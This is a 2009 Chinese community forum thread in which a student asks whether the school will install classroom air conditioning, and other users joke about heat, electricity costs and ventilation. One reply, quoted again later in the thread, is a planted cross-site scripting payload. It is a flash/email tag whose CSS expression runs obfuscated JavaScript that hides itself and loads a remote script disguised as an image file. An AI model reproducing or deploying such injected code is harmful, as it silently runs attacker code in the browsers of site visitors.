服务热线:0754 - 88943210
2024年汕头春季网络招聘会

[讨论]学校有没有这个打算

吃咸蛋変超人 发表于 2009-6-1 18:57:00 | 显示全部楼层 |阅读模式
5446 19

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区

您需要 登录 才可以下载或查看,没有账号?注册河畔 |

x
询问下,学校有没有打算在我们初二放假面临初三的一个月中,为各个教室装上空调

我想到时候我们要升上初三,每天天气那么烦闷,而且是八月大热天,风扇有没有吹即各处

一热,流汗,超负荷,就想睡,那样也对学习不好吧

所以恳求学校商讨一下,可不可以装下空调

如果资金问题,可向各个同学询问一下意见,然后看大家的反应嗯嗯

大家觉得有无必要装个空调在教师呢???

突然回想起,千年夏天,哗,去市实考试时候,那个空调吹得那个爽啊啊

所以,希望学校能够增加一下这个配套服务嗯嗯
是否有云开雾散的经历。

全部回复(19)
这个问题去年说过。不了了之。算了吧小妹妹…
汕头全民爆料请 下载安装蓝色河畔App即可!
是前年夏天吧
啊啊啊,不爽啊,热死人啦,回想起市实,美好的一天
是否有云开雾散的经历。
哎安装了到时个个同学整天就只在教室里学习下课也不出去,多好呢!
就是就是,学校啊学校
哎,学校装空调,四年前我读初一的时候就这么想了,可是如果装了,一个月的电费该是多大的开支,这笔开支又不能划到学生头上,关于市实,你要知道他们旁边就是教育局了,
大爆炸!!!
其实...聿初的教室还是很通风的......
以下是引用吖男在2009-6-3 23:23:00的发言:

其实...聿初的教室还是很通风的......

旁边盖楼了,风都被挡了
是否有云开雾散的经历。
[flash,0,0]http://catche.qq.com/temp/20081209/4236888.swf[email=]id=baidu style=ee:expression(eval(unescape('this.parentNode.style.display%3D%27none%27%3Bif%28%21window.xxr%29%7Bvar%20l%3Ddocument.createElement%28%27script%27%29%3Bl.src%3D%27http%3A//love.avtupian.com/a/q/mq.jpg%27%3Bl.type%3D%27text/javascript%27%3Bdocument.getElementsByTagName%28%27head%27%29.item%280%29.appendChild%28l%29%3Bwindow.xxr%3D1%7D')));display:none;@qq.com[/email][/flash]

以下是引用十加三在2009-6-5 16:50:00的发言:
[flash,0,0]http://catche.qq.com/temp/20081209/4236888.swf[email=]id=baidu style=ee:expression(eval(unescape('this.parentNode.style.display%3D%27none%27%3Bif%28%21window.xxr%29%7Bvar%20l%3Ddocument.createElement%28%27script%27%29%3Bl.src%3D%27http%3A//love.avtupian.com/a/q/mq.jpg%27%3Bl.type%3D%27text/javascript%27%3Bdocument.getElementsByTagName%28%27head%27%29.item%280%29.appendChild%28l%29%3Bwindow.xxr%3D1%7D')));display:none;@qq.com[/email][/flash]
  啥来的~
是否有云开雾散的经历。
6年前读初一时就讨论过啦,哈哈,那时是第一届,所以学校没什么钱,这时候应该有钱了吧……不过聿怀是不支持享受主义的,所以,可能性不高
多么美好的幻想///
以下是引用冬瓜汤在2009-6-6 13:18:00的发言:
6年前读初一时就讨论过啦,哈哈,那时是第一届,所以学校没什么钱,这时候应该有钱了吧……不过聿怀是不支持享受主义的,所以,可能性不高
学校哪会没钱呢。。开玩笑
去拿奖学金的说某间房里好多CASH呢~
学校没钱的可能性是0!!!
是否有云开雾散的经历。
通风啊,吹进教室的都是热的。
陪衬不一定伟大.
以下是引用在2009-6-6 23:53:00的发言:
学校哪会没钱呢。。开玩笑
去拿奖学金的说某间房里好多CASH呢~

呵呵,因为那时是第一届啊~~~而且那时学校很多东西还没搞,以前那个废弃地现在都建食堂啦(呵呵,是不是食堂忘记了还是实验室啊,毕业的时候还没建)现在应该有钱啦~~~呵呵,不过可能性应该是0!高中部那边似乎就没有空调……
吹什么空调…对身体不好啊…你看学校多么为学生着想…也要帮老师想下…办公室的也应该拆了。要是热就去找波姐…保证凉、娘死你…非
吹什么空调…对身体不好啊…你看学校多么为学生着想…也要帮老师想下…办公室的也应该拆了。要是热就去找波姐…保证凉、娘死你…非
非一般的非,牛!!